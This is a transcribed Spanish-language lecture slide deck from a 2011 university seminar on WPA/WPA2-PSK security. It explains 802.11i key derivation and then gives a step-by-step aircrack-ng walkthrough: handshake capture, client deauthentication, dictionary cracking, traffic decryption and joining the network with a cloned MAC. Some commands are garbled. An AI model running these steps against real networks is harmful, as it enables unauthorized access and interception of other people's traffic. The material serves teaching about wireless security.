vulnerabilidad wpa

18
5/17/2018 VulnerabilidadWPA-slidepdf.com http://slidepdf.com/reader/full/vulnerabilidad-wpa 1/18 Vulnerabilidad WPA Ing. Rafael García Chinguel UNIVERSIDAD NACIONAL PEDRO RUIZ GALLO FACULTAD DE CIENCIAS FISICAS Y MATEMATICAS ESCUELA PROFESIONAL DE INGENIERIA ELECTRONICA SINTEC 2011 1

Upload: cliff-caro-suarez

Post on 20-Jul-2015

304 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 1/18

Vulnerabilidad WPA

Ing. Rafael García Chinguel

UNIVERSIDAD NACIONAL PEDRO RUIZ GALLOFACULTAD DE CIENCIAS FISICAS Y MATEMATICAS

ESCUELA PROFESIONAL DE INGENIERIAELECTRONICA

SINTEC

2011

1

Page 2: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 2/18

Contenido

• IEEE 802.11i - WPA

• REQUISITOS PARA VULNERAR WPA

Ejemplo de vulnerar una clave wpa

2

Page 3: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 3/18

IEEE 802.11i

3

Page 4: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 4/18

Objetivos de 802.11i

• Autentificación

• APCliente: El AP tiene que garantizar que el clientees quien dice ser

Cliente

AP: El Cliente tiene que garantizar que el APes verdadero y no un AP engañoso (man – in –the –middle attack)

• Privacidad

La información no es legible por terceros.• Integridad

 La información no puede ser alterada en transito.

4

Page 5: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 5/18

Como trabaja 802.11i

802.11i tiene 3 partes

 – Supplicant (Solicitante, Cliente)

 – Authenticator (Autenticador, AP)

 – Authentication Server (Servidor de Autenticación,RADIUS)

Y es hecha por una combinación de protocolos:

 –

802.1X – A Port Based Network Access Control – EAP – Extensible Authentication Protocol

 – RADIUS – Remote Access Dial In User Service

5

Page 6: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 6/18

Variantes de 802.11i

El proceso de autenticación puede ser de 2

maneras:

 – Home Mode: (modo casero, personal)

• Pre Shared Key (PSK)

 – Enterprise Mode: (modo corporativo)

• 802.1X/EAP

6

Page 7: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 7/18

802.11i PSK

Una “llave Maestra” llamada PMK – Pairwise Master Key es creada porun hash entre la Passphrase y elSSID.

La PMK es guardada en el Registrode Windows ó en supplicant.conf en

Linux.

Otra llave llamada PTK Pairwise

Transient Key es creada de manera

dinámica después de un proceso de

handshake de 4 vías. PTK es únicaa cada sesión.

7

Page 8: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 8/18

Privacidad con 802.11i

Privacidad

• Después de la autenticación, los dos lados – AP y Cliente tienen la misma PMK – Pairwise

Master Key que se mantiene durante toda lasesión

• Para la transmisión de datos, es hecha una

derivación de la PMK y una PTK – PairwiseTransient Key única para cada cliente esutilizada para encriptación.

8

Page 9: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 9/18

Integridad con 802.11iUna parte de la PTK tiene la función de proteger los datospara que no sean alterados cuando en transito – es el MICMessage Integrity Check (MIC). Con el MIC, para todo

paquete el transmisor calcula un hash de los datos con unallave secreta – Temporal Integrity Key.

MIC = hash(packet, temporal integrity key)

WPA usa TKIPAlgoritimo de Hashing “Michael” 

WPA2 uses CCMPCipher Block Chaining MessageAuthentication Check – CBCMAC

9

Page 10: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 10/18

¿ Cuanto segura es WPA / WPA2 PSK ?

• La manera conocida hoy de crackear WPA/PSK essolamente por un ataque de diccionario.

• Como la llave maestra PMK combina una contraseña con elSSID, escogiendo dos palabras fuertes, hace ineficientes los

diccionarios pre-compilados• No hay diferencias en la manera y nivel de dificultad para

crackear WPA-PSK ó WPA2-PSK, porque el mecanismo quegenera la PMK es el mismo. Solamente cambia el MIC.

• Herramienta para quiebra de WPA/WPA2 – PSK –

Cowpatty http://sourceforge.net/projects/cowpatty • La mayor fragilidad de PSK para WISP’s es que la llave se

encuentra en texto plano en las computadoras de losclientes

10

Page 11: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 11/18

¿ Cuán segura es WPA / WPA2 PSK ?

Cuando el atacante tiene la llave PMK es

possible:

• Ganar acceso no autorizado

• Falsificar un Punto de acceso y hacer el ataque

del “hombre del medio” (man in the middle)

11

Page 12: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 12/18

REQUISITOS PARA VULNERAR WPA

• Tener diccionarios: *.txt

• Backtrack 5 en USB ó DVD

Tarjeta inalámbrica

12

Page 13: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 13/18

EJEMPLO DE VULNERAR UNA CLAVEWPA

13

Page 14: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 14/18

INICIANDO EL PROCESO CON

BACKTRACK

• Cambiar orden de booteo (Bootear con DVD O

USB):

 – Start Backtrack in text mode

 – startx (consola grafica)

 – iwconfig (muestra las tarjetas que están

instaladas)

 – User: root y passwd: toor, en algunas

distribuciones de backtrack

14

Page 15: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 15/18

1ER CLI DE BACKTRACK

1- Configurar tarjeta modo monitor

airodump-ng start wlan0

2. Reconocer el entorno inalámbricoairodump-ng wlan0 –t WPA

3. Capturar paquete de datos: Handshakeairodump-ng –c canal –b mac_AP -w nombre_archivo wlan0

15

Page 16: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 16/18

2DA CLI DE BACKTRACK

4 . Asociación falsa usuario cliente:

(Tiene que existir un cliente)

aireplay-ng -1 0 –a “Mac_AP” –h “Mac_Cliente” wlan0 

5. Ataque 0 (para desauntenticar al cliente)

aireplay-ng -0 10 -a “Mac_AP” -c “Mac _Cliente” wlan0 

6. Busca la clave:

aircrack-ng –w ruta_del_diccionario –b mac_ap “ruta del hankshake” 

16

Page 17: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 17/18

DECODIFICACION Y ANALISIS DE IP Y

DNS

7. Decodificar los paquetes:

airdecap-ng –p “frase clave” –e ssid “ruta completa de archivo.cap” 

Nota que se genera un nuevo archivo captura-01-

dec.cap (descifrada)

8. Analizar el trafico capturado:

wireshark “ruta del nuevo archivo.dec.cap” 

Filter: DNS

17

Page 18: Vulnerabilidad WPA

5/17/2018 Vulnerabilidad WPA - slidepdf.com

http://slidepdf.com/reader/full/vulnerabilidad-wpa 18/18

CONECTARSE A LA RED

• LO UNICO QUE QUEDA ES CONECTARSE A LA

RED BAJO CUALQUIER SISTEMA OPERATIVO

• SE DEBE TENER EN CUENTA:

 – CLONAR MAC

 – EL MISMO SEGMENTO DE RED

 – DNS

18